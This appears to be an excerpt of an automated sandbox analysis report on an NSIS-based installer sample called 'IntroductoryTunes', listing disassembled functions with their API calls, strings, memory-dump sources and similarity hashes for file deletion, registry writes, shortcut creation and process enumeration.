FindClose.KERNEL32(?), ref: 00406E5F

Strings

Delete: DeleteFile("%s"), xrefs: 00406DE8
RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
ptF, xrefs: 00406D1A
\*.*, xrefs: 00406D2F
RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
Delete: DeleteFile failed("%s"), xrefs: 00406E29
RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
API String ID: 2035342205-1650287579
Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE

Function 004044D1 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F0), ref: 00404525
IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
GetDlgItem.USER32(?,000003FB), ref: 00404553
GetAsyncKeyState.USER32(00000010), ref: 0040455A
GetDlgItem.USER32(?,000003F0), ref: 0040456F
ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
SetWindowTextW.USER32(?,?), ref: 004045AF
SHBrowseForFolderW.SHELL32(?), ref: 00404669
lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
CoTaskMemFree.OLE32(00000000), ref: 00404674

Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3

Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB

GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424976,759223A0,00000000), ref: 00406902

SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819

Strings

A, xrefs: 00404662
F, xrefs: 004046A0

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
String ID: F$A
API String ID: 3347642858-1281894373
Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59

Function 00406EFE Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
lstrcmpA.KERNEL32(name,?), ref: 00406FF3
CloseHandle.KERNEL32(?), ref: 00407212

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

%s: failed opening file "%s", xrefs: 00406F38
GetTTFNameString, xrefs: 00406F33
name, xrefs: 00406FEB

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
String ID: %s: failed opening file "%s"$GetTTFNameString$name
API String ID: 1916479912-1189179171
Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75

Function 00406831 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424976,759223A0,00000000), ref: 00406902
GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00424976,759223A0,00000000), ref: 00406A73

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406A0B
F, xrefs: 00406858
F, xrefs: 00406A7F
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406952

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 3581403547-1792361021
Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59

Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E

Strings

CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: CreateInstance
String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
API String ID: 542301482-1377821865
Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54

Function 004063D8 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
lstrlenW.KERNEL32(?), ref: 004063F8
GetVersionExW.KERNEL32(?), ref: 00406456

Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D

LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
FreeLibrary.KERNEL32(00000000), ref: 00406500
GlobalFree.KERNEL32(?), ref: 00406509

Strings

Kernel32.DLL, xrefs: 004065C7
Process32NextW, xrefs: 004065F4
CreateToolhelp32Snapshot, xrefs: 004065E1
Module32NextW, xrefs: 0040660A
GetModuleBaseNameW, xrefs: 004064C0
EnumProcessModules, xrefs: 004064B6
Module32FirstW, xrefs: 004065FF
EnumProcesses, xrefs: 004064AE
Process32FirstW, xrefs: 004065E9
Unknown, xrefs: 00406528
PSAPI.DLL, xrefs: 00406490

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
API String ID: 20674999-2124804629
Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59

Function 004040E4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
GetDlgItem.USER32(?,000003E8), ref: 004041AD
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
GetSysColor.USER32(?), ref: 004041DB
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
lstrlenW.KERNEL32(?), ref: 00404202
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E

Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030

GetDlgItem.USER32(?,0000040A), ref: 00404276
SendMessageW.USER32(00000000), ref: 0040427D
GetDlgItem.USER32(?,000003E8), ref: 004042AA
SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
SetCursor.USER32(00000000), ref: 004042FE
ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
SetCursor.USER32(00000000), ref: 00404322
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363

Strings

open, xrefs: 0040430B
F, xrefs: 004042D3
N, xrefs: 00404298

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
String ID: F$N$open
API String ID: 3928313111-1104729357
Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99

Function 00406AC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD

Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24

GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
wsprintfA.USER32 ref: 00406B79
GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63

Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
GlobalFree.KERNEL32(00000000), ref: 00406C7E
CloseHandle.KERNEL32(?), ref: 00406C88

Strings

^F, xrefs: 00406ACF
plF, xrefs: 00406B54
%s=%s, xrefs: 00406B6F
NUL, xrefs: 00406ACA
[Rename], xrefs: 00406BF4, 00406C03

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
String ID: ^F$%s=%s$NUL$[Rename]$plF
API String ID: 565278875-3368763019
Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010D8
FillRect.USER32(00000000,?,00000000), ref: 004010ED
DeleteObject.GDI32(?), ref: 004010F6
CreateFontIndirectW.GDI32(?), ref: 0040110E
SetBkMode.GDI32(00000000,00000001), ref: 0040112F
SetTextColor.GDI32(00000000,000000FF), ref: 00401139
SelectObject.GDI32(00000000,?), ref: 00401149
DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
SelectObject.GDI32(00000000,00000000), ref: 00401169
DeleteObject.GDI32(?), ref: 0040116E
EndPaint.USER32(?,?), ref: 00401177

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4

Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
RegCloseKey.ADVAPI32(?), ref: 004029E4

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
WriteReg: error creating key "%s\%s", xrefs: 004029F5
WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4

Memory Dump Source

Source File: 00000009.00000002.2177524155.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2177477666.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177655889.0000000000409000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000040C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000420000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000434000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.000000000046B000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2177776767.0000000000497000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2178083551.0000000000500000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_IntroductoryTunes.jbxd

Similarity

API ID: lstrlen$CloseCreateValuewvsprintf
String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
API String ID: 1641139501-220328614
Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
